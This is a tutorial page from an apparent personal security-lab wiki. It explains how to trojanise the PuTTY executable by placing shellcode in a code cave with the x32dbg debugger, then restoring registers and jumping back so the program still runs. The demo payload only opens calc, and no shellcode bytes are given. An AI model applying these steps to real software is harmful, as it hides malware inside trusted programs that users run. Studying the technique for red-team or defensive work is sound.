AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page
  • Backdooring a code cave with Putty POC
  • Find Code Cave
  • Adding shellcode
  • Jmp back to Putty

Was this helpful?

  1. Offensive Cyberz

Create a Trojan

PreviousWireless AttacksNextRecommended Readings

Last updated 3 years ago

Was this helpful?

Backdooring a code cave with Putty POC

There are 3 areas a PE can be backdoored:

· Code cave

· Create new section

· Extend a section

We’ll be focused on creating a backdoor in the code cave for this example.

Download Putty and x32Dbg

Find Code Cave

Open Putty with debugger

You’ll notice the first breakpoint is set before the process is initialized.

We’ll focus on this portion of the code so the backdoor can be executed before putty is initialized.

Our code cave will reside in the .text section

Code Cave Start Address 0045C961

Set a break point at this address so it can be referenced for later in the breakpoints tab.

Adding shellcode

Head on back to the entry point and add a jmp call to your code cave where the shellcode will reside. Before adding the jmp call, copy the first few calls since they are about to be overwritten and you’ll need to maintain the functionality of putty.

Add jmp call where the entry point is.

Now at the start of your code cave you will want to change the instructions to save the registers and flags

Now you can add your shellcode by highlighting a section large enough to fit your shellcode and then add it by Right Clicking the highlighted section and selecting Binary -> Edit.

You now have shellcode inserted into putty and if this was saved and ran, the shellcode would run but putty would not be initialized so we will have to identify which instruction in the shellcode terminates the process and overwrite that with a jmp call back to the start of putty. You can confirm that your shellcode is running by either saving the patches made and running the new PE or running through each breakpoint. At the end you should notice the shellcode run (calc opens in this case) and the debugger is blank (the process terminated), if you ran through each breakpoint.

Jmp back to Putty

To find the instruction that exits the process, set a breakpoint on every call instruction in the shellcode. You will then need to step through each breakpoint to see which one terminates the process.

In this case, the call instruction at 0045C9FA opens calc and the call instruction at 0045CA19 terminates the process.

The final step will be to skip the final call instruction and jump back to the original putty. To do this, replace the push 0 instruction before the final call instruction with a jmp instruction to an address in the code cave with room to modify it’s contents. In this section we will add the registers and flags that were saved and some of the code that was overwritten by the first jump instruction.

In the screenshot above, you’ll see that the registers and flags were added back, and then the instructions that were overwritten were added back before jumping back to the original putty code. Now patch the file and run it. You’ll see the putty and calc.exe.

https://x64dbg.com/